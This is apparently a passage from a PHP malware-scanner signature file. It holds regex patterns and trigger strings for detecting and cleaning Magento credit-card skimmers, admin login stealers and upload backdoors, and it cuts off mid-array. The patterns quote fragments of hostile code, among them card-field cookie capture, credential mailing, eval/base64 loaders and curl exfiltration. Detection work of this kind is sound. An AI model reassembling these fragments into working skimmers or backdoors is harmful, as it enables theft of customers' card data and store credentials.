					'$_SERVER[\'REMOTE_ADDR\'];' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.109.02', '\$ip[\s]*=[\s]*\$_SERVER\[.REMOTE_ADDR.\];[\s]*\$[\w]+[\s]*=[\s]*date\(.h:i:s[^\}]+'),
				),
			),
		),

		'($this->_dispatch.$this->_action.$this->_content)("http' => array(STR_TRIGGER,
			'@$s_func(' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.112', 'if\(isset\(\$_POST\[.payment[^\{]+\{[^\}]+\$[\w]+\(+\$this->_dispatch\.\$this->_action\.\$this->_content\)\(.http[^;]+\);[\s]*\}'), 
			'$results = ($this->_dispatch' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.112.02', '\$results[\s]*=[\s]*\(\$this->_dispatch[^\(]+\)\(.http[^;]+\);[\s]*(#?print[^;]+\);[\s]*die;)?'), 
		),

		'document.cookie = "currentcvv=" + document.getElementsByName("payment' => array(STR_CHAIN_TRIGGER,
			'if(document.getElementsByName("payment[cc_exp_year]")[0]) {document.cookie = "currentyear=" + document.getElementsByName("payment[cc_exp_year]")[0].value +"; path=/";}' => array(STR_CLEAR_MULTIMATCH, 'js.malware.magento-cc-stealer.111', '(if\(document\.getElementsByName\(.(billing|payment)[^\)]+\)\[0\]\)[\s]*\{[^\}]+path=..;\}[\s]*){5,}[^\}]*jQuery\.ajax\(\{[\s]*url:[^\}]+[\}\)]+'),
			'cccid\s+=\s+\'\';\s+if\(document\.getElementsByName\(\"payment\[cc_number\]' => array(REX_CLEAR_LINEMATCH, 'js.malware.magento-cc-stealer.111.02', 'cccid = \'\';'),
		),

		'\'1337\'' => array(STR_TRIGGER,
			'|| $_POST[\'payment\'][\'method\'] === $' => array(STR_TRIGGER,
				'$_COOKIE[\'control_hash\']);' => array(STR_TRIGGER,
					'curl_setopt($ch,CURLOPT_POSTFIELDS, http_build_query($ok));' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.117.02', '\$[\w]+[\s]*=[\s]*..saveOrder..;[\s]*\$[\w]+[\s]*=[\s]*.[\w]+.;[\s]*if[\s]*\(stripos\(\$_SERVER\[.REQUEST_URI.\],[\s]*\$[\w]+\)[\s]*!==[\s]*false[\s]*&&[\s]*\(!\$[\w]+[\s]*\|\| \$_POST\[.payment.\]\[.method.\][\s]*===[^\}]+curl_close[^;]+;[\s]*\}'),
				),
			),
		),

		'file_put_contents(' => array(STR_TRIGGER,
			'if(isset($_POST[\'payment\'][\'cc_number\']) && $_POST[\'payment' => array(STR_TRIGGER,
				'$_POST[\'billing\'][\'email\']."\r\n", FILE_APPEND);' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.051', 'if.isset.._POST..payment....cc_number[^{]+\\{[\\s]*file_put_contents\\([^,]+,[\\s]*\\$_POST..payment[^)]+FILE_APPEND\\);[\\s]*}'),
			),
		),

		'if(isset($_POST[\'payment\']) && isset($_POST[\'payment\'][\'cc_exp_year\'])' => array(STR_TRIGGER,
			'billing = Mage::getSingleton' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.066', 'error_reporting\(0\);[\s]*if[\s]*\(isset[\s]*\([\s]*\$_POST\[.payment.\]\) && isset\(\$_POST\[.payment.\]\[.cc_exp_year[^;]+\$payment[\s]*=[\s]*\$_POST..payment..;[^:]+Mage::getSingleton..checkout.session[^;]+;[\s]*\$[\w]+[\s]*=[\s]*@fopen[^;]+;[\s]*[^{]+if[\s]*\(\$[\w]+\)[\s]*\{[^\|]+fwrite[^;]+\);[\s]*fclose\([^;]+\);[\s]*\}[\s]*(\$[\w]+[\s]*=[\s]*.{100,}@\$[\w]+\(\$[\w]+\(\$[\w]+\(\$[\w]+\(\$[\w]+\)\)\)\);)?[\s]*\}'), 
		),

		'-BEGIN CERTIFICATE-' => array(STR_TRIGGER,
			'JPEG-1.1' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.036', 'if..function_exists..Mage_initDbController..\) \{[^\}]+->password\[0\];[^\!]+?if .\!function_exists..fputcsv[^\*]+\*[^\}]+?= "-----BEGIN CERTIFICATE-----[^\*]+\.\*[^\*]+?\@touch.\$\w+, \$\w+, \$\w+.;\s*\}\s*\}(?!\s*[\}\$])'),
		),

		'$_cur = getcwd();' => array(STR_TRIGGER,
			'fwrite($fp, $username." : ".$password."\n");' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.111', '\$_cur[\s]*=[\s]*getcwd\(\);[\s]*\$fp[\s]*=[\s]*fopen[^;]+\);[\s]*fwrit[^;]+\);[\s]*fclose\(\$fp\);'),
		),
		
        'ustomEvent("devtoolschange"' => array(STR_TRIGGER,
	        '/checkout/.test' => array(STR_CLEAR_LINEMATCH, 'js.malware.magento-cc-stealer.049.03', 'var\s+\w+;\(function\(\)\{var\s+\w=\{open:!\d,orientation:null\},\w=function\(\w,\w\)\{window.dispatchEvent\(new.CustomEvent\(\"devtoolschange",{detail:\{open:\w,orientation:\w[^k]*kout\/\.test.window.location\)\&\&\(\w+=\w+\s+self..Web..concat\(\"[s,S]\",..,.oc.,..,.ke[^w]*wss:\/\/(\w+\.){1,3}\w+\/\w+[^;]*;'),
        ),

		'if (preg_match(\'/report_search_grid/\', base64_decode($_REQUEST[\'___directive\'])))' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.032', 'if \(preg_match\(.\/.\/admin.\/Cms_Wysiwyg.\/directive[^\}]+?if .preg_match..\/report_search_grid\/., base64_decode.._REQUEST[^\}]+?\}(\s*\}){1,2}'),
		'CWlmIChpc3NldCgkZGF0YVtiYXNlNjRfZGVjb2RlKCdZMk5mYm5WdFltVnkn' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.033', '(\$\w+) = "[^"]+";\s*\1\d = \1\([^\)]+\);\s*\1\d = \1\d\([^\(\)]+\(.CWlmIChpc3NldCgkZGF0[^\)]+\)\);\s*\1\d\([^\)]+\);'),
		'eval(base64_decode(strrev($' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.035', '(\$\w+)\s*\=\s*[\'"][a-zA-Z0-9=\+]{50,}[\'"];\s*eval.base64_decode.strrev.\1\)\)\);'),
		'$this->sendCcNumber();' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.002.02', '\$this->sendCcNumber\(\);|function\s*\w+\(\)\s*\{\s*\$\w+\s*=\s*\$this->getInfoInstance\(\);\s*\$\w+\s*=\s*new\s*Mage_Checkout_Block_Onepage_Billing;[^\x2]+?\}(?=\s*\/\*\*)'), //Renamed from php.malware.magento-cc-stealer.025 to match the main sig 002 (in following type10)! + made it clean both parts
		'eval(function(w,i,s,e){' => array(STR_CLEAR_LINEMATCH, 'js.malware.magento-cc-stealer.041.02', ';eval\(function\(w,i,s,e\)\{var[^}]+\}var[^}]+}return [\w]+\.join\(..\);\}\([^;]+\)\);'),
		'$post = "firstname=".$info->firstname."&lastname=".$info->lastname."&street1=' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.082', '\$info = new stdClass\(\);[\s]*\$card[\s]*=[\s]*\$this->getRequest\(\)->getPost\(.payment.,[\s]*array\(\)\);[^\*]+curl_close\(\$[\w]+\);'),
		'echo "Return Code: " . $_FILES["file"]["error"] . "<br>";' => array(STR_CLEARFILE, 'php.backdoor.uploader.302', NULL),
		'base64_encode(preg_replace(\'@\.@\',\'_\',$_SERVER[\'HTTP_HOST' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.102', 'if\(\$_POST\)[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*FALSE;[\s]*class[\s]*[\w]+[\s]*\{[\s]*public[\s]*static[\s]*function[\s]*[\w]+\(\$[\w]+,\$[\w]+\)[\s]*\{[\s]*if\(is_array\(\$[\w]+\)\)[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*[\w]+::[\w]+\(\$[\w]+\);[\s]*\}[\s]*\$[\w]+[\s]*=[\s]*stream_context_create\([\s]*array\([\s]*.http.[\s]*=>[\s]*array[^\}]+curl_exec\(\$[\w]+\);[\s]*curl_close\(\$[\w]+\);[\s]*\}[\s]*if\(is_string\(\$[\w]+\)\)[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*trim[^\@]+@\$this->[\w]*\(\);[^\{]+private[\s]*function[\s]*[\w]*\(\)[\s]*\{[\s]*if\(\$_COOKIE\[[^@]+\@setcookie\([^&]+&&[\s]*!\$[\w]+\)[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*TRUE;[\s]*\}[\s]*\}[\s]*\}[\s]*\$[\w]+[\s]*=[\s]*new[\s]*[\w]+\(\);[\s]*\}'),
		'curl_init();curl_setopt($ch,CURLOPT_URL, base64_decode(' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.105', 'if[\s]*\([\s]*isset\(\$_POST\[.[\w]+.\]\)[^>]+http_build_query\(array\([^\(]+base64_encode[\s]*\([\s]*json_encode\(\$_POST[^\}]+curl_close\(\$[\w]+\);[\s]*\}[\s]*if[\s]*\([\s]*isset[\s]*\(\$_POST\[.[\w]+.\][\s]*\)[\s]*\)[\s]*\{[^\}]+[\s]*\)[\s]*\);[\s]*\}[\s]*\$[\w]+[\s]*=[\s]*curl_init\(\);[\s]*curl_setopt\(\$[\w]+[^\(]+base64_decode\([^\}]+curl_close\(\$[\w]+\);[\s]*\}'),
		'if(@preg_match("/checkout' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.106', 'if[\s]*\([\s]*\@preg_match\(..[\w]+\|[^,]+,[\s]*\$_SERVER\[.REQUEST_URI.][\s]*\)[\s]*\)[\s]*\{[\s]*@file_put_contents\([^,]+,[\s]*@base64_encode\([\s]*serialize[\s]*\(\$_REQUEST\)[^\;]+FILE_APPEND\);[\s]*\}'),
		'=String.fromCharCode(127);return _.join("").split("%")' => array(STR_CLEAR_LINEMATCH, 'js.malware.magento-cc-stealer.106', 'var [^=]+=[\s]*function[^\}]+\}[\s]*var [\w]+[\s]*=[\s]*String\.fromCharCode[^;]+;[\s]*return[^\n]+\]\]\([^\)]+\)[\s]*\}'),
		'=\'b\'.\'a\'.\'s\'.\'e\';$' => array(STR_CLEAR_LINEMATCH, 'php.malware.cc_stealer.020', 'ini_set\(\'display_errors\',.0\);\$\w+.=.implode\("_",.array\(\"[s,t,r]*"."[s,t,r]*",.implode\(""[^;]*;\$\w+=\'b\'[^;]*;\$\w+...\'64\'[^S]*ST[^r]*rim[^;]*;'),
	),

	'class Mage_' => array(STR_TRIGGER,

		'mail(' => array(STR_TRIGGER,

			'Mage_Admin' => array(STR_TRIGGER,

				'$_SERVER[\'SERVER_NAME\'];' => array(STR_TRIGGER,
					'\$user->getId\(\)\) \{[\s]*\$[\w]+[\s]*=[^(]+\$_SERVER\[.SERVER_NAME.\];' => array(REX_CLEAR_MULTIMATCH, 'php.malware.login-stealer.001', '(?<=\$user->getId\(\)\) \{)[\s]*\$[\w]+[\s]*=[\s]*\$[^\}]+\);[\s]*(?=\$this->renewSession\(\);)'),
				),

				'$message = $username.\'' => array(STR_CLEAR_MULTIMATCH, 'php.hacktool.magento-credential-stealer.001', '\$to = \'[^\'\@]+?\@[^\']+?\';\s*\$subject =[^;]+;\s*\$message = \$username\.[^;]+;\s*\$headers =[^;]+?X-Mailer: PHP[^;]+;\s*mail\(\$to[^\)]+\);'),
				'$_SERVER[\'HTTP_HOST\']."=".base64_encode(json_encode(array($username,$password,$user->getEmail(),Mage::helper' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-login-stealer.004', '\\$[\\w]+[\\s]*=[\\s]*\\$_SERVER..HTTP_HOST....=..base64_encode.json_encode.array..username..password..user[^;]+getCurrentUrl.....;[\\s]*\\$[\\w]+[\\s]*=[\\s]*curl_init\\(\\);[\\s]*(curl_setopt[^;]+;[\\s]*)+\\$[\\w]+[\\s]*=[\\s]*curl_exec[^;]+;[\\s]*curl_close[^;]+;'),
			),

			'.$passwor' => array(STR_TRIGGER,
				'$geo = unserialize(file_get_contents' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-login-stealer.007', '\$user_ip = getenv[^;]+;\s*\$geo = unserialize.file_[^\{\},E]+?mail\("[^"]+","[^"]+"\.\$_SERVER[^\)]+\)\s*;'),
				',"Admin Login Boss"' => array(STR_CLEAR_LINEMATCH, 'php.malware.magento-login-stealer.007.02', 'mail\("[^"]+","Admin Login Boss"\.\$_SERVER[^\)]+\);'),
			),

			'mail\([^,]+,[\s]*.(?i:admin from)[\s]*.\.[\s]*\$_SERVER\[.HTTP_HOST.\],[\s]*.(?i:login)[\s]*:' => array(REX_CLEAR_LINEMATCH, 'php.malware.magento-login-stealer.002', 'mail\([^,]+,[\s]*.(?i:admin from)[\s]*.\.[\s]*\$_SERVER\[.HTTP_HOST.\],[\s]*.(?i:login)[\s]*:[^;]+\]\);'),
			'@mail($_post,$billing->getCountry()." Credit Card' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.076', '\$billing[\s]*=[\s]*\$order->getBillingAddress\(\);[\s]*\$data[\s]*=[^;]+;[\s]*\$data[\s]*\.=[^;]+;[\s]*\$data[\s]*\.=[^}]+@mail\(\$_post,\$billing->getCountry\(\)\." Credit[^;]+\);'),
		),

		'$_SERVER[\'HTTP_USER_AGENT\'];' => array(STR_TRIGGER,
			'($customer->authenticate($username, $password))' => array(STR_TRIGGER,
				'else { $country_code = $country_codes;' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.006', '\$[\w]+[\s]*=[\s]*\$_SERVER\[.HTTP_HOST.\];[\s]*[^\}]+\}[\s]*else[\s]*\{[\s]*\$country_code = \$country_codes;[^\*]+\$country_code[^;]+";[\s]*\$[\w]+\(\$[\w]+,[\s]*\$[\w]+[^;]+\);'),
			),
		),

		'/cc_' => array(STR_TRIGGER,
			'txt","a");' => array(STR_TRIGGER,
				'$clientip\nUser Agent : $useragent\n======' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-login-stealer.003', '\\$[\\w]+ = fopen."[^"]+txt","a"\\);[\\s]*fwrite.\\$[\\w]+,[\\s]*"Username : \\$username..Password : \\$password[^"]+===.n"\\);'),
			),
		),

		'json_decode(file_get_contents(' => array(STR_TRIGGER,
			'getenv("REMOTE_ADDR' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-login-stealer.005', '\$ip[\s]*=[\s]*getenv\(.REMOTE_ADDR.\);[\s]*\$[\w]+[\s]*=[\s]*json_decode.file_get_contents\(.http[^;]+;[\s]*\$[\w]+[\s]*=[\s]*\$_SERVER..HTTP_HOST..;[\s]*\$message[^}]+data=..\$message..\&subject=..\$subject..\&server=[^;]+;[\s]*\$[\w]+[\s]*=[\s]*curl_init\(\);[^}]+curl_close\(\$[\w]+\);'),
		),

		'curl_post_async(base64_decode("http' => array(STR_TRIGGER,
			'array("q"=>base64_encode(json_encode($data1))));' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.044', 'try \\{[\\s]*\\$billing = Mage::getSingleton..checkout.session[^;]+getData..;[\\s]*if[\\s]*\\(!empty.._SERVER[^>]+\\$ipc[\\s]*=[\\s]*\\$_SERVER..REMOTE_ADDR..;[\\s]*\\}[\\s]*\\$data1=array..server[^;]+ip.=>\\$ipc.;[\\s]*\\$this->curl_post_async.base64_decode[^;]+;[\\s]*}'),
		),

		'$info->getCcOwner();' => array(STR_TRIGGER,
			'fputs($logme, $line, strlen($line));' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.052', 'private function _storeInfos\(\$file = [^\)]+\)\{[^;]+this->getInfoInstance\(\);[\s]*\$[\w]+[\s]*=[\s]*\$[\w]+->getCcNumber[^;]+getCcOwner\(\);[^}]+fclose\(\$logme\);[\s]*\}'),
		),

		'Mage_Shell' => array(STR_TRIGGER,
			'if[\s]*\([\s]*isset[\s]*\([\s]*\$_POST\[.[\w]+.\][\s]*\)[\s]*\)[\s]*echo[\s]*\$_POST\[.[\w]+.\][\s]*\([\s]*\$_POST\[.[\w]+.\]\);' => array(REX_CLEAR_LINEMATCH, 'php.malware.injector.069', 'if[\s]*\([\s]*isset[\s]*\([\s]*\$_POST\[.[\w]+.\][\s]*\)[\s]*\)[\s]*echo[\s]*\$_POST\[.[\w]+.\][\s]*\([\s]*\$_POST\[.[\w]+.\]\);'),
		),

		'function curl_post_async($url, $params)' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.044.02', 'function curl_post_async\\(\\$url, \\$params\\)[\\s]\\{[\\s]*foreach[^}]+key\\..=..urlencode..val.;[\\s]*\\}[^}]+\\$result[\\s]*=[\\s]*curl_exec\\(\\$ch\\);[\\s]*curl_close\\(\\$ch\\);[\\s]}'),
		'file_put_contents($container, "\n".$this->encryptSession(json_encode($data)), FILE_APPEND);' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.053', '(?:public function saveSession\(\)[\s]*\{[\s]*\$container[^;]+;[\s]*\$dtime[^;]+;[\s]*if[\s]*\(isset.._POST..payment....cc_number[^&]+publickey.\).&& function_exists[^}]+return base64_encode.\$ekey[^{]+else \{[\s]*return false;[\s]*}[\s]*}|\$this->saveSession\(\);)'),
		'$tres = file_get_contents("$rcpt?data=$res&domain=$dmn");' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.054', '\$dmn =[^;]+;[\s]*\$rcpt =[^;]+;[\s]*\$ccnum = \$info->getCcNumber\(\);[\s]*if *.strlen..ccnum.>[^}]+(FILE_APPEND\);[\s]*|\$tres = file_get_contents\("\$rcpt\?data=\$res&domain=\$dmn"\);)?}'),
		'$emailboss = $username;' => array(STR_CLEAR_MULTIMATCH, 'php.hacktool.magento-credential-stealer.003', '\$emailboss = \$username;\s*?\$[^b]+boss\s=\s(?:[^;]+;){1,10}\s*?mail[^;]+?;'),
		'private function _saveInfos()' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.067', 'private function _saveInfos\(\)[^\.]+?\.\s*?\$cinfo->getCcNumber\(\)[^\}]+?\}'),
		'$db($key,"' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-login-stealer.008', '\$srv[^;]+?;\s*?\$ips[^;]+?;(?:\s*?\$\w+[^;]+?;\s*?){1,2}?\$db\s*?= "ma"\."il";\s*?\$key(?:[^;]+?;\s*?){1,3}?\$db\(\$key,"\w+?: \$srv", \$auth, \$headr\);'),
		'if[\s]*\([\s]*@[\s]*\$_COOKIE[\s]*\[[\s]*.[\w]+.[\s]*\][\s]*\)[\s]*\([\s]*\$_[\s]*=[\s]*@[\s]*\$_REQUEST[\s]*\[.[\w]+.\][\s]*\).@[\s]*\$_[\s]*\([\s]*\$_REQUEST[\s]*\[.[\w]+.\][\s]*\);' => array(REX_CLEAR_LINEMATCH, 'php.backdoor.request.009', 'if[\s]*\([\s]*@[\s]*\$_COOKIE[\s]*\[[\s]*.[\w]+.[\s]*\][\s]*\)[\s]*\([\s]*\$_[\s]*=[\s]*@[\s]*\$_REQUEST[\s]*\[.[\w]+.\][\s]*\).@[\s]*\$_[\s]*\([\s]*\$_REQUEST[\s]*\[.[\w]+.\][\s]*\);'),
	),

	'Mage_' => array(STR_TRIGGER,

		'|$data7|' => array(STR_TRIGGER,
			'|$data8|' => array(STR_TRIGGER,
				'|$data3|' => array(STR_CHAIN_TRIGGER,
					'@file_get_contents' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.022', '(\$[\w]+[\s]*=[\s]*\$[\w]+[\s]*->[^;]+\);[\s]*){8,}\$[\w]+[\s]*=[\s]*substr\(\$[^@]+@file_get_contents[^;]+\);'),
					'$object = new Mage_Checkout_Block_Onepage_Billing;' => array(STR_CLEAR_LINEMATCH, 'php.malware.magento-cc-stealer.022.02', '\$object = new Mage_Checkout_Block_Onepage_Billing;'),
				),
			),
		),

		'or die("Error");' => array(STR_CHAIN_TRIGGER,
			'$data3' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.002.05', '\$[\w]+[\s]*=[\s]*\$this->getInfoInstance\(\);[\s]*(\$[\w]+[\s]*=[^;]+;[\s]*){5,}\$[\w]+[\s]*=[^\n]+data[^\n]+[\'"];'),
			'fopen(getcwd()' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.002.04', '\$[\w]+[\s]*=[\s]*fopen\(getcwd\(\)[\s]*\.[^;]+Error.\);[^\{]+fwrite\([^;]+\);[\s]*fclose\(\$[\w]+\);'),
		),

		'Mage_Checkout_Block_Onepage_Billing;' => array(STR_TRIGGER,
			'public function [\w]+\(\)[\s]*\{[\s]*(\$[\w]+[\s]*=[^;]+;[\s]*)*\$[\w]+[\s]*=[\s]*new Mage' => array(REX_TRIGGER,
				'new Mage_Checkout_Block_Onepage_Billing' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.002.07', 'public function [\w]+\(\)[\s]*\{[\s]*(\$[\w]+[\s]*=[^;]+;[\s]*)*\$[\w]+[\s]*=[\s]*new Mage_Checkout_Block_Onepage_Billing;[^\x2]+?(\}(?=\s*\/\*\*)|(curl_close[^;]+;[\s]*\}(?=\s*\})))'),
			),
		),

		'$data5 = $this->' => array(STR_TRIGGER,
			'\'a+\');' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.002.06', '\$[\w]+[\s]*=[\s]*\$this->[^;]+;[\s]*(\$[\w]+[\s]*=[^\n]+;[\s]*){5,}\$[\w]+[\s]*=[\s]*fopen[^;]+\);[\s]*fwrite[^;]+\);[\s]*fclose[^;]+\);'),
		),


		'$send' => array(STR_TRIGGER,
			'"datapost=".($datasend);' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.078', '\$send[\s]*=[\s]*array[\s]*\([^;]+;[\s]*foreach[\s]*\(\$send as[^:]+"datapost="\.\(\$datasend\);[\s]*\$url[\s]*=[\s]*.http:[^;]+;[\s]*\$[\w]+[\s]*=[\s]*curl_init[^}]+curl_close\(\$[\w]+\);'),
		),

		'new Mage_Checkout_Block_Onepage_Billing;' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.002', 'function [\w]+\(\)[\s]*\{[\s]*(\$[\w]+[\s]*=[^;]+;[\s]*)*\$[\w]+[\s]*=[\s]*new Mage_Checkout_Block_Onepage_Billing;[^\x2]+?(\}(?=\s*\/\*\*)|curl_close[^;]+;[\s]*\}(?=\s*\})|getBillingAddress\(\)->getEmail\(\);[\s]*\})'),
		'curl_setopt($ch, CURLOPT_POSTFIELDS, $post77);' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.001', '.object = new Mage_Checkout_Block_Onepage_Billing;\s*\$address1[^\?]+?\$ch.;\s*(?:\/\/ run the whole process\s+)?curl_close..ch.;'),
	),

	'class Mage_Checkout_Model_Type_Onepage' => array(STR_TRIGGER,

		'eval' => array(STR_TRIGGER,
			'\$[\w]+[\s]*=[\s]*.[^;]{200}[^;]+;[\s]*eval' => array(REX_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.092', '\$[\w]+[\s]*=[\s]*.[^;]{200}[^;]+;[\s]*eval[\s]*\([^;]+\);'),
			'eval(gzinflate(base64_decode' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.107', 'eval\(gzinflate\(base64_decode[^;]{300,}\);'),
			'Y2Nf' => array(STR_CLEAR_LINEMATCH, 'php.malware.magento-cc-stealer.123', 'eval[\s]*[^;]+Y2Nf[^;]+\)[\s]*;'),
		),

		'\',\'PaymentReport\',$datasend);' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.056', '\$send(?:[^;]+?;){1,6}?\s*?mail\s*?\([^,]+?,\'PaymentReport\',\$datasend\);'),
	),

	'mail(' => array(STR_TRIGGER,
	
		'base64_encode($this->getCustomer()->getEmail()' => array(STR_CHAIN_TRIGGER,
			'$authParam = $request;' => array(STR_CLEAR_LINEMATCH, 'php.malware.magento-cc-stealer.127', '\$authParam = \$request;'),
			'$this->getAuthenticate($authParam);' => array(STR_CLEAR_LINEMATCH, 'php.malware.magento-cc-stealer.127.02', '\$this->getAuthenticate\(\$authParam\);'),
			'$auth_url = base64_encode($this->getCustomer()->getEmail());' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.127.03', 'public function getAuthenticate\(\$request\)\s+\{[^j]*jpg\'\;\s+try.\{\s+if\(\!file_exists\(\$[^1]*1\)\;\s+\}\s+if\(\$[^u]*urn.\$this;\s+\}'), 
		),
		
		'$data .= "$key -- $item\r\n";' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.088', '\$data\s*=\s*[\'"]{2}\s*;\s*foreach\(\$this->getRequest\(\)->getPost\(\)\s*as\s*\$key\s*=>\s*\$item\s*\)\s*{\s*if\(is_array\(\$item\)\s*\)\s*{\s*foreach\(\s*\$item[^;]+;\s*}\s*}\s*else\s*{\s*\$data\s*\.\s*=\s*[\'"]\$key[^;]+;\s*}\s*}\s*}\s*else\s*{\s*\$data\s*\.\s*=\s*[\'"]\$key\s*--\s*\$item[^;]+;\s*}\s*}\s*\$data\s*\.\s*=\s*[^\.]+\.get_client_ip\(\)\.[^;]+;\s*mail\([\'"]\S+\@\S+[\'"]\s*,\s*[^,]+,\s*\$data\s*\)\s*;'),
	),

	'$situs = $evil_destination' => array(STR_CHAIN_TRIGGER,
		'if(preg_match("#".$ip_korban."#", $preg_view' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.063'   , '\$evil_destination = "http[^"]+";[\s]*\$ip_korban = \$_SERVER[^;]+;[\s]*\$situs = \$evil_destination[^;]+;[\s]+\$[\w]+ = curl_init\(\);[^#]+if\(preg_match\([^)]+preg_view\)\)[\s]*\{'), //these two should be detected and cleared together, by PG
		'$paypal_fake = curl_exec($' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.063.02', '\} else \{[\s]*\$situs = \$evil_destination[^:]+:[^:]+http_build_query\(\$params[^;]+\);[\s]*}'),
	),

	'$b64  = "base' => array(STR_TRIGGER,
		'$b64(\'aHR0cDov' => array(STR_CLEARFILE, 'php.backdoor.magento-uploader.006', NULL),
	),

	'@shell_exec(' => array(STR_TRIGGER,
		'curl --data' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.094', '\$[\w]+[\s]*=[\s]*implode\(._.,[\s]*array\(.str.,[\s]*.rot13.\)\);[\s]*\$[\w]+[\s]*=[\s]*\$[\w]+\(.[\w]+.\);[\s]*\$[\w]+[^\{]+\$[\w]+\(\$_REQUEST\)\)\)\{[\s]*@shell_exec\(.curl[\s]*--data[^\}]+dev\/null[\s]*2<&1[\s]*&.\);[\s]*\}'),
	),

	'app/Mage.php' => array(STR_TRIGGER,
		'setRoleIds(array($role->getId()))' => array(STR_CLEARFILE, 'php.hacktool.magento_admin.002', NULL),
	),

	'$ARINFO = $_POST;' => array(STR_CLEAR_MULTIMATCH,'php.malware.magento-cc-stealer.024', 'if[\s]*\([\s]*isset[\s]*\([\s]*\$_POST\)[\s]*&&[\s]*is_array\(\$_POST\)[\s]*&&[\s]*count\(\$_POST\)[\s]*>[\s]*[\d]+[\s]*\)[\s]*\{[^\}]+ARINFO[^\}]+[\}\s]+(\$log_entry[\s]*=[\s]*serialize[^\}]+\}[^\}]+fclose[^;]+;[\s\}]+|if[\s]*\([\s]*isset\(\$_COOKIE[^\}]+file_put_contents[^;]+;[\s\}]+|\$[\w]+[\s]*=[\s]*base64_[^\}]+\}[^\}]+[\s\}]+)'), 
	'>Magento File Upload Vulnerability<' => array(STR_CLEARFILE, 'php.backdoor.magento-uploader.003', NULL),
	'query_verifto += "&cc_year=" + encodeURIComponent' => array(STR_CLEAR_MULTIMATCH, 'js.malware.magento-cc-stealer.038', 'var blockformerchtoreplace[^&]+?&cc_month[^;]+?;\s*query_verifto \+= "&cc_year=" \+ encodeURIComponent(?:[^:]+?:){1,5}\s*query_verifto[^\|]+?\|\|\s*\(\s*location\.href\.indexOf\(.idecheckoutvm[^&]+?&[^\}]+\}\s*\}\s*\}\s*\);?'),
	'$this->ccNumberProccess();' => array(STR_CLEARLINE, 'php.malware.magento-cc-stealer.002.03', '$this->ccNumberProccess();'),
	'$this->sucuri_encrypted();' => array(STR_CLEAR_LINEMATCH, 'php.malware.magento-cc-stealer.002.08', '\$this->sucuri_encrypted\(\);[\s]*'),
	'Magento Jquery Upload Scanner' => array(STR_CLEARFILE, 'php.backdoor.magento-uploader.004', NULL),
	'$quoteObj =  Mage::getSingleton(\'checkout/session\')->getQuote();' => array(STR_CLEAR_LINEMATCH, 'php.malware.magento-cc-stealer.083.04', '\$quoteObj\s*=\s*Mage::getSingleton\(\'checkout\/session\'\)->getQuote\(\)\s*;'),
	'\'.$quoteObj->getBaseGrandTotal().\'&url=\'.urlencode(' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.083.03', '\'[\/\w]+\.php\?\w+=\'\.\$quoteObj->getBaseGrandTotal\(\)\.\'&url=\'\.urlencode\('),
	'(\$\w+)\s*=\s*Mage::GetBaseDir\(\)\s*;\s*require\s*\1\.\'[\/\w_-]+\.(?:php|js|asp)\'\s*;' => array(REX_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.083.05', '(\$\w+)\s*=\s*Mage::GetBaseDir\(\)\s*;\s*require\s*\1\.\'[\/\w_-]+\.(?:php|js|asp)\'\s*;'),
),

'get_' => array(STR_TRIGGER,

